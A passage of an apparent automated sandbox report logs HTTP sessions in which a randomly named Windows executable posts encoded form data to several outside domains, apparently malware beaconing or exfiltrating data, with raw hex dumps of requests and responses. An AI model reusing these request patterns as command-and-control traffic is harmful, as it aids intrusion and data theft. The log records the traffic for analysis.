Jul 4, 2024 16:55:05.599883080 CEST  1159               IN         Data Ascii: td></tr><tr><td><table><tr><td colspan="2"><h2>Gallery - Kostenlose Galerie Software!</h2></td></tr><tr><td style="width:100px;text-align:center;"><img style="display:block;" src="https://www.domaintechnik.at/fileadmin/gfx/logos/hostedsoft/gal
Jul 4, 2024 16:55:05.603004932 CEST  5                  IN         Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
28          192.168.2.7  49735        213.145.228.168  80                6404  C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe
Timestamp                            Bytes transferred  Direction  Data
Jul 4, 2024 16:55:07.399606943 CEST  528                OUT        GET /aroo/?fhW=BLvXr6e0EhyxeX&YbCL=bKy7FSIHmKYFjPoPKsunUN9vBLYaDX52twFEynhtde+XdOqoRjh1sl1n+ba+sSXyFBuEELqLWRHnTW9JDkHGG0QhvMR72FivEUbGSmkuxinEDBYWWrvqFUEDSzpZ60+MRxZstpJridvk HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-us
Host: www.sandranoll.com
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Jul 4, 2024 16:55:08.144592047 CEST  1236               IN         HTTP/1.1 404 Not Found
Date: Thu, 04 Jul 2024 14:55:07 GMT
Server: Apache/2.4.56 (Debian)
X-Powered-By: PHP/7.4.33
Strict-Transport-Security: max-age=63072000; preload
Connection: Upgrade, close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
Data Ascii: cab<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xmlns="http://www.w3.org/1999/xhtml"><head> <title>Domain www.sandranoll.com is registered by Domaintechnik</title> <meta http-equiv="content-type" content="application/xhtml+xml; charset=UTF-8" /> <meta http-equiv="content-language" content="en" /> <link rel="stylesheet" href="css/styles.css" /></head><body> <div id="parking_page_header"> <div id="parking_page_header_inner"><img src="http://www.domaintechnik.at/data/gfx/dt_logo_parking.png" alt="Domaintechnik.at Logo" /></div> </div> <div id="content"> <h1>The Domain www.sandranoll.com is registered!</h1> <p style="padding:20px 0 10px 0;font-size:1.2em;" class="align-center">Als Domaininhaber k&ouml;nnen Sie Ihre Domains online verwalten, Inhaberdaten aktualisieren, <br />Domainweiterleitungen e
Jul 4, 2024 16:55:08.144619942 CEST  1236               IN         Data Ascii: inrichten, Webhosting bestellen und Vieles mehr.<br />Ebenso k&ouml;nnen Sie online neue Domains registrieren und bei Bedarf ein Web Hosting Paket, auch Webspace genannt, bestellen.</p> <div id="parking_boxes"><table><tr><td><table><tr
Jul 4, 2024 16:55:08.144633055 CEST  1049               IN         Data Ascii: lign:center;"><img src="https://www.domaintechnik.at/fileadmin/gfx/icons/control_panel_icon.gif" alt="Hosting Control Panel" /></td><td style="width:300px;">Mit dem Domaintechnik.at Hosting Control Panel verwalten Sie alle Belange Ihres Hostin
Jul 4, 2024 16:55:08.148912907 CEST  5                  IN         Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
29          192.168.2.7  49736        91.195.240.19    80                6404  C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe
Timestamp                            Bytes transferred  Direction  Data
Jul 4, 2024 16:55:13.231476068 CEST  790                OUT        POST /tf44/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-us
Accept-Encoding: gzip, deflate, br
Host: www.gipsytroya.com
Origin: http://www.gipsytroya.com
Cache-Control: max-age=0
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 217
Referer: http://www.gipsytroya.com/tf44/
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Data Ascii: YbCL=+FKgbPBnyVok7l/2GpAU4sTAuh6YA7wFonJTv8oYQGe6XCNNk4NXJ32YEKM6FWTidhC4XMdGv/Zw7hk75I/K2vvzEeYFB5nQHxKPlEA6E1i0f2NfHiSIqDYX8ciOHj/6RTaSd9ggBT0qO9VMms19fdJCX8g9hrucP7qjve9UViWFybKZhTH5JE4vgPgvSgkTYUneeIZkSzt301w7PA==
Jul 4, 2024 16:55:13.875991106 CEST  707                IN         HTTP/1.1 405 Not Allowed
date: Thu, 04 Jul 2024 14:55:13 GMT
content-type: text/html
content-length: 556
server: Parking/1.0
connection: close
Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          30192.168.2.74973791.195.240.19806404C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe
                                          TimestampBytes transferredDirectionData
                                          Jul 4, 2024 16:55:15.777513981 CEST810OUTPOST /tf44/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                          Accept-Language: en-us
                                          Accept-Encoding: gzip, deflate, br
                                          Host: www.gipsytroya.com
                                          Origin: http://www.gipsytroya.com
                                          Cache-Control: max-age=0
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Content-Length: 237
                                          Referer: http://www.gipsytroya.com/tf44/
                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                                          Data Raw: 59 62 43 4c 3d 2b 46 4b 67 62 50 42 6e 79 56 6f 6b 36 45 76 32 45 4b 34 55 2f 4d 54 48 72 68 36 59 57 4c 77 42 6f 6e 56 54 76 35 46 46 58 31 71 36 58 69 39 4e 6c 35 4e 58 4b 33 32 59 63 36 4d 46 4c 32 54 70 64 68 4f 77 58 4a 39 47 76 2f 39 77 37 6c 67 37 35 2f 44 4a 33 2f 76 39 64 4f 59 48 63 70 6e 51 48 78 4b 50 6c 45 6c 76 45 7a 4b 30 66 69 4a 66 57 32 47 4c 6d 6a 59 57 35 73 69 4f 57 7a 2f 2b 52 54 61 67 64 2f 46 46 42 52 38 71 4f 38 6c 4d 6e 39 31 2b 57 64 4a 45 61 63 68 4a 6f 5a 72 33 47 71 2b 61 6d 39 78 4b 64 69 2b 63 36 4e 58 37 37 78 4c 56 58 56 41 55 6b 4e 45 5a 46 47 35 6d 61 56 6a 47 54 71 74 46 4e 45 49 64 35 6e 52 2f 5a 78 6f 50 4b 66 2f 55 32 78 30 5a 6f 47 6a 61 6a 57 63 6a 58 69 63 3d
                                          Data Ascii: YbCL=+FKgbPBnyVok6Ev2EK4U/MTHrh6YWLwBonVTv5FFX1q6Xi9Nl5NXK32Yc6MFL2TpdhOwXJ9Gv/9w7lg75/DJ3/v9dOYHcpnQHxKPlElvEzK0fiJfW2GLmjYW5siOWz/+RTagd/FFBR8qO8lMn91+WdJEachJoZr3Gq+am9xKdi+c6NX77xLVXVAUkNEZFG5maVjGTqtFNEId5nR/ZxoPKf/U2x0ZoGjajWcjXic=
                                          Jul 4, 2024 16:55:16.422389030 CEST | 707 | IN | HTTP/1.1 405 Not Allowed
                                          date: Thu, 04 Jul 2024 14:55:16 GMT
                                          content-type: text/html
                                          content-length: 556
                                          server: Parking/1.0
                                          connection: close
                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                                          Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          31 | 192.168.2.7 | 49738 | 91.195.240.19 | 80 | 6404 | C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Jul 4, 2024 16:55:18.307742119 CEST | 1823 | OUT | POST /tf44/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                          Accept-Language: en-us
                                          Accept-Encoding: gzip, deflate, br
                                          Host: www.gipsytroya.com
                                          Origin: http://www.gipsytroya.com
                                          Cache-Control: max-age=0
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Content-Length: 1249
                                          Referer: http://www.gipsytroya.com/tf44/
                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                                          Data Raw: 59 62 43 4c 3d 2b 46 4b 67 62 50 42 6e 79 56 6f 6b 36 45 76 32 45 4b 34 55 2f 4d 54 48 72 68 36 59 57 4c 77 42 6f 6e 56 54 76 35 46 46 58 30 53 36 58 78 31 4e 6b 61 56 58 4c 33 32 59 43 4b 4d 45 4c 32 54 30 64 6c 69 4b 58 4a 35 57 76 39 31 77 36 47 34 37 2f 4f 44 4a 2b 2f 76 39 41 65 59 47 42 35 6d 4b 48 77 36 31 6c 45 31 76 45 7a 4b 30 66 6a 35 66 57 69 53 4c 6b 6a 59 58 38 63 69 43 48 6a 2f 57 52 51 72 56 64 2f 42 2f 43 69 45 71 4f 63 31 4d 6c 50 74 2b 64 64 4a 47 4a 73 68 52 6f 59 58 6f 47 75 57 34 6d 38 31 30 64 68 65 63 72 49 6e 69 6d 51 72 42 4d 31 4e 4f 6c 39 49 75 4c 56 39 53 65 48 7a 4e 51 64 49 6c 47 58 55 64 30 32 39 7a 54 6c 70 4a 63 35 32 2b 39 41 38 69 6d 54 65 2b 6e 47 41 69 56 30 6d 72 75 34 32 58 6c 4f 54 4d 58 4b 78 50 6a 35 39 65 48 4d 4b 72 46 69 6e 32 36 4b 73 57 55 31 4c 31 33 2f 32 73 44 34 38 46 37 35 76 62 77 72 41 50 52 34 31 37 41 31 74 36 31 4f 48 41 54 4f 44 53 62 39 78 6e 58 57 46 59 36 4c 4a 73 4d 78 67 72 74 45 30 4e 56 41 77 64 6d 49 50 41 47 6b 39 33 44 57 62 4b 76 [TRUNCATED]
                                          Data Ascii: YbCL=[TRUNCATED]


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          32 | 192.168.2.7 | 49739 | 91.195.240.19 | 80 | 6404 | C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Jul 4, 2024 16:55:20.836631060 CEST | 528 | OUT | GET /tf44/?YbCL=zHiAY6EG+HxIxFu8Foth356DlimOdN8M+W8Rr/tGfSzDPDxggLk9FyyADeImH3/ZYgS5WMd+vNhhyXlbnciyxdfJd/gaB8T0bTbhtXVrFmCpPW1iSF+B9h4XvImdTXjqQBmtK+ZYAHNG&fhW=BLvXr6e0EhyxeX HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                          Accept-Language: en-us
                                          Host: www.gipsytroya.com
                                          Connection: close
                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                                          Jul 4, 2024 16:55:21.492542982 CEST | 113 | IN | HTTP/1.1 439
                                          date: Thu, 04 Jul 2024 14:55:21 GMT
                                          content-length: 0
                                          server: Parking/1.0
                                          connection: close


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          33 | 192.168.2.7 | 49740 | 194.58.112.174 | 80 | 6404 | C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Jul 4, 2024 16:55:26.621589899 CEST | 805 | OUT | POST /mooq/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                          Accept-Language: en-us
                                          Accept-Encoding: gzip, deflate, br
                                          Host: www.helpers-lion.online
                                          Origin: http://www.helpers-lion.online
                                          Cache-Control: max-age=0
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Content-Length: 217
                                          Referer: http://www.helpers-lion.online/mooq/
                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                                          Data Raw: 59 62 43 4c 3d 33 41 52 4a 70 41 4f 43 46 54 64 57 33 52 42 38 33 49 62 4b 43 6f 51 66 34 6b 2f 52 64 68 69 31 57 79 69 69 30 73 54 56 46 56 2f 4c 66 58 36 68 4a 69 54 4e 38 41 56 6d 75 53 62 39 4f 61 33 48 72 48 4d 52 51 6a 63 45 44 76 62 36 48 52 49 34 67 43 49 6a 6e 4e 63 6a 52 47 45 6d 35 33 56 71 68 43 75 77 46 6d 62 4e 68 41 74 45 54 2f 77 4a 47 6e 61 37 59 38 58 33 6e 4e 7a 44 6c 67 6d 39 4f 45 64 41 49 2f 36 55 7a 56 52 61 74 4e 68 4f 34 71 4b 45 6d 78 30 4c 6f 41 37 75 41 46 71 72 44 30 47 2f 59 61 50 4d 58 71 36 4d 70 62 55 61 43 47 73 57 58 4c 56 66 71 52 36 7a 59 47 30 4e 30 6f 53 47 76 50 59 64 31 35 65 56 59 36 54 66 58 51 3d 3d
                                          Data Ascii: YbCL=3ARJpAOCFTdW3RB83IbKCoQf4k/Rdhi1Wyii0sTVFV/LfX6hJiTN8AVmuSb9Oa3HrHMRQjcEDvb6HRI4gCIjnNcjRGEm53VqhCuwFmbNhAtET/wJGna7Y8X3nNzDlgm9OEdAI/6UzVRatNhO4qKEmx0LoA7uAFqrD0G/YaPMXq6MpbUaCGsWXLVfqR6zYG0N0oSGvPYd15eVY6TfXQ==
                                          Jul 4, 2024 16:55:27.350744009 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Thu, 04 Jul 2024 14:55:27 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Content-Encoding: gzip
                                          Data Raw: 65 33 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb ec 29 77 a8 82 d0 70 1d df 33 7d cf 75 3c 55 b7 74 75 1d 5f fa 22 50 6e a3 14 46 63 57 85 3d a5 30 d3 40 75 1c d9 28 49 d7 2d 89 5e a0 36 72 79 59 3e 43 8e 22 df b4 c3 10 b3 4c fa 3b 58 49 d6 7a 43 42 34 4c 86 3f ab cb 25 41 2a 84 c6 06 b2 ab ac 2b 06 37 6c d6 43 3b 70 86 51 d3 3a 56 3f ba [TRUNCATED]
                                          Data Ascii: e34Zmo_qdCKrtu-HI6+4hW`Can^@=\dq}=<oGh6WF[#J^QF%QT$AFK0NK=9PP}{(P`ds~n9MV995B[!"'rUskk)wp3}u<Utu_"PnFcW=0@u(I-^6ryY>C"L;XIzCB4L?%A*+7lC;pQ:V?~KYGoQ 7hgGRz}u1n,T@z#\-?8dXF0@0LfQ~f5i$<l$!;mc[Ek2SmN4pV+!J);G$R`x/~Em|'y|^%WpHmxax&<X;oo(Y]V0fu43V+uvc+CdbfX<buJF:?iyL[nw2UoxW[,~By3VEt%`Zlh"tS-@` ]G=\b(;XxfG4hm|'V,$tk(U#Dx%^i>s-ku2-P2!uZ<x/$)A-d8)k!d0kggU]UGXo1zwEm_G [TRUNCATED]
                                          Jul 4, 2024 16:55:27.350768089 CEST | 1236 | IN | Data Raw: c0 83 46 df d3 f6 e9 ac 13 f3 17 98 d6 35 06 f0 6a c7 6b b9 6a 23 32 b4 87 63 c2 28 f0 bd ee d3 8d 02 5a 06 dc 6d 8a 6a ff 02 7a 11 c2 a0 de c7 f1 3d e0 8c 47 98 62 db 59 ff d5 ca 09 47 6d 6d f2 5c 92 b6 0f de 1b 20 68 7a 0a e3 fe 19 a1 f0 7e f2
                                          Data Ascii: F5jkj#2c(Zmjz=GbYGmm\ hz~%\qy)nT\@)9tJF@o|ZYj!;]har`$C/0N1(~$?<,CfRN>C+@?: 1AO!V?lX
                                          Jul 4, 2024 16:55:27.350781918 CEST | 1236 | IN | Data Raw: bb 78 2a ab 44 16 fc 4f a2 4f 66 3d 90 97 0e cb 22 4f 4f 53 8c 71 32 be 18 91 d9 06 9d d3 5a d0 1f 45 79 ca 0b 8a 89 2d 12 69 ce 12 38 53 2e 9c 5b a0 39 d2 64 b0 fa 23 30 e9 a7 1c fd b1 e1 65 b4 43 9e a3 22 fe 86 bb 01 d5 3a f5 00 89 d7 b0 89 ce
                                          Data Ascii: x*DOOf="OOSq2ZEy-i8S.[9d#0eC":wO\3mb.@8>2D=8@39i#(O l:#48SNtVOdgOLWp62^="?*7YF>P8V
                                          Jul 4, 2024 16:55:27.350795031 CEST | 114 | IN | Data Raw: 89 de cb bd 0a 0b d9 aa 50 8b 23 87 4d 27 f4 03 2e e2 71 af 17 8d ec f9 59 14 e3 6c da 19 74 f5 db b6 b9 2b d9 a2 10 66 65 f2 e2 15 1c 1d 72 e3 59 a0 0f c7 c2 43 9f b3 b2 1d fa ee 28 52 2b 82 ae 4a ce 1a 67 f0 33 bc b2 52 12 d2 c5 43 29 72 04 9d
                                          Data Ascii: P#M'.qYlt+ferYC(R+Jg3RC)rO&%Yp~ykFi)0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          34 | 192.168.2.7 | 49741 | 194.58.112.174 | 80 | 6404 | C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Jul 4, 2024 16:55:29.149800062 CEST | 825 | OUT | POST /mooq/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                          Accept-Language: en-us
                                          Accept-Encoding: gzip, deflate, br
                                          Host: www.helpers-lion.online
                                          Origin: http://www.helpers-lion.online
                                          Cache-Control: max-age=0
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Content-Length: 237
                                          Referer: http://www.helpers-lion.online/mooq/
                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                                          Data Raw: 59 62 43 4c 3d 33 41 52 4a 70 41 4f 43 46 54 64 57 33 79 4a 38 31 72 44 4b 46 49 51 59 79 45 2f 52 53 42 6a 38 57 79 75 69 30 70 2f 46 46 48 72 4c 66 33 4b 68 49 6e 76 4e 37 41 56 6d 68 79 62 34 44 36 33 59 72 48 41 5a 51 6a 51 45 44 76 66 36 48 51 34 34 31 6c 6b 6b 6d 64 63 68 58 47 45 6f 33 58 56 71 68 43 75 77 46 6d 2f 7a 68 45 4a 45 54 50 41 4a 47 47 61 34 51 63 58 6f 67 4e 7a 44 68 67 6d 68 4f 45 64 75 49 37 36 2b 7a 54 64 61 74 4d 52 4f 37 37 4b 44 78 68 30 4e 6d 67 36 50 4e 41 4c 45 45 46 32 32 42 59 43 57 59 62 4c 75 73 74 4a 34 59 6b 67 36 4a 61 74 6b 75 54 65 46 50 67 70 34 32 70 57 65 69 74 73 38 71 4f 37 2f 56 6f 79 62 42 67 4e 30 6f 34 72 71 49 72 7a 74 78 52 4e 63 4a 70 31 49 73 47 6b 3d
                                          Data Ascii: YbCL=3ARJpAOCFTdW3yJ81rDKFIQYyE/RSBj8Wyui0p/FFHrLf3KhInvN7AVmhyb4D63YrHAZQjQEDvf6HQ441lkkmdchXGEo3XVqhCuwFm/zhEJETPAJGGa4QcXogNzDhgmhOEduI76+zTdatMRO77KDxh0Nmg6PNALEEF22BYCWYbLustJ4Ykg6JatkuTeFPgp42pWeits8qO7/VoybBgN0o4rqIrztxRNcJp1IsGk=
                                          Jul 4, 2024 16:55:29.859321117 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Thu, 04 Jul 2024 14:55:29 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Content-Encoding: gzip
                                          Data Raw: 65 33 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb ec 29 77 a8 82 d0 70 1d df 33 7d cf 75 3c 55 b7 74 75 1d 5f fa 22 50 6e a3 14 46 63 57 85 3d a5 30 d3 40 75 1c d9 28 49 d7 2d 89 5e a0 36 72 79 59 3e 43 8e 22 df b4 c3 10 b3 4c fa 3b 58 49 d6 7a 43 42 34 4c 86 3f ab cb 25 41 2a 84 c6 06 b2 ab ac 2b 06 37 6c d6 43 3b 70 86 51 d3 3a 56 3f ba [TRUNCATED]
                                          Data Ascii: e34Zmo_qdCKrtu-HI6+4hW`Can^@=\dq}=<oGh6WF[#J^QF%QT$AFK0NK=9PP}{(P`ds~n9MV995B[!"'rUskk)wp3}u<Utu_"PnFcW=0@u(I-^6ryY>C"L;XIzCB4L?%A*+7lC;pQ:V?~KYGoQ 7hgGRz}u1n,T@z#\-?8dXF0@0LfQ~f5i$<l$!;mc[Ek2SmN4pV+!J);G$R`x/~Em|'y|^%WpHmxax&<X;oo(Y]V0fu43V+uvc+CdbfX<buJF:?iyL[nw2UoxW[,~By3VEt%`Zlh"tS-@` ]G=\b(;XxfG4hm|'V,$tk(U#Dx%^i>s-ku2-P2!uZ<x/$)A-d8)k!d0kggU]UGXo1zwEm_G [TRUNCATED]
                                          Jul 4, 2024 16:55:29.859339952 CEST | 1236 | IN | Data Raw: c0 83 46 df d3 f6 e9 ac 13 f3 17 98 d6 35 06 f0 6a c7 6b b9 6a 23 32 b4 87 63 c2 28 f0 bd ee d3 8d 02 5a 06 dc 6d 8a 6a ff 02 7a 11 c2 a0 de c7 f1 3d e0 8c 47 98 62 db 59 ff d5 ca 09 47 6d 6d f2 5c 92 b6 0f de 1b 20 68 7a 0a e3 fe 19 a1 f0 7e f2
                                          Data Ascii: F5jkj#2c(Zmjz=GbYGmm\ hz~%\qy)nT\@)9tJF@o|ZYj!;]har`$C/0N1(~$?<,CfRN>C+@?: 1AO!V?lX
                                          Jul 4, 2024 16:55:29.859352112 CEST | 1236 | IN | Data Raw: bb 78 2a ab 44 16 fc 4f a2 4f 66 3d 90 97 0e cb 22 4f 4f 53 8c 71 32 be 18 91 d9 06 9d d3 5a d0 1f 45 79 ca 0b 8a 89 2d 12 69 ce 12 38 53 2e 9c 5b a0 39 d2 64 b0 fa 23 30 e9 a7 1c fd b1 e1 65 b4 43 9e a3 22 fe 86 bb 01 d5 3a f5 00 89 d7 b0 89 ce
                                          Data Ascii: x*DOOf="OOSq2ZEy-i8S.[9d#0eC":wO\3mb.@8>2D=8@39i#(O l:#48SNtVOdgOLWp62^="?*7YF>P8V
                                          Jul 4, 2024 16:55:29.859416962 CEST | 114 | IN | Data Raw: 89 de cb bd 0a 0b d9 aa 50 8b 23 87 4d 27 f4 03 2e e2 71 af 17 8d ec f9 59 14 e3 6c da 19 74 f5 db b6 b9 2b d9 a2 10 66 65 f2 e2 15 1c 1d 72 e3 59 a0 0f c7 c2 43 9f b3 b2 1d fa ee 28 52 2b 82 ae 4a ce 1a 67 f0 33 bc b2 52 12 d2 c5 43 29 72 04 9d
                                          Data Ascii: P#M'.qYlt+ferYC(R+Jg3RC)rO&%Yp~ykFi)0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          35 | 192.168.2.7 | 49742 | 194.58.112.174 | 80 | 6404 | C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Jul 4, 2024 16:55:31.681422949 CEST | 1838 | OUT | POST /mooq/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                          Accept-Language: en-us
                                          Accept-Encoding: gzip, deflate, br
                                          Host: www.helpers-lion.online
                                          Origin: http://www.helpers-lion.online
                                          Cache-Control: max-age=0
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Content-Length: 1249
                                          Referer: http://www.helpers-lion.online/mooq/
                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
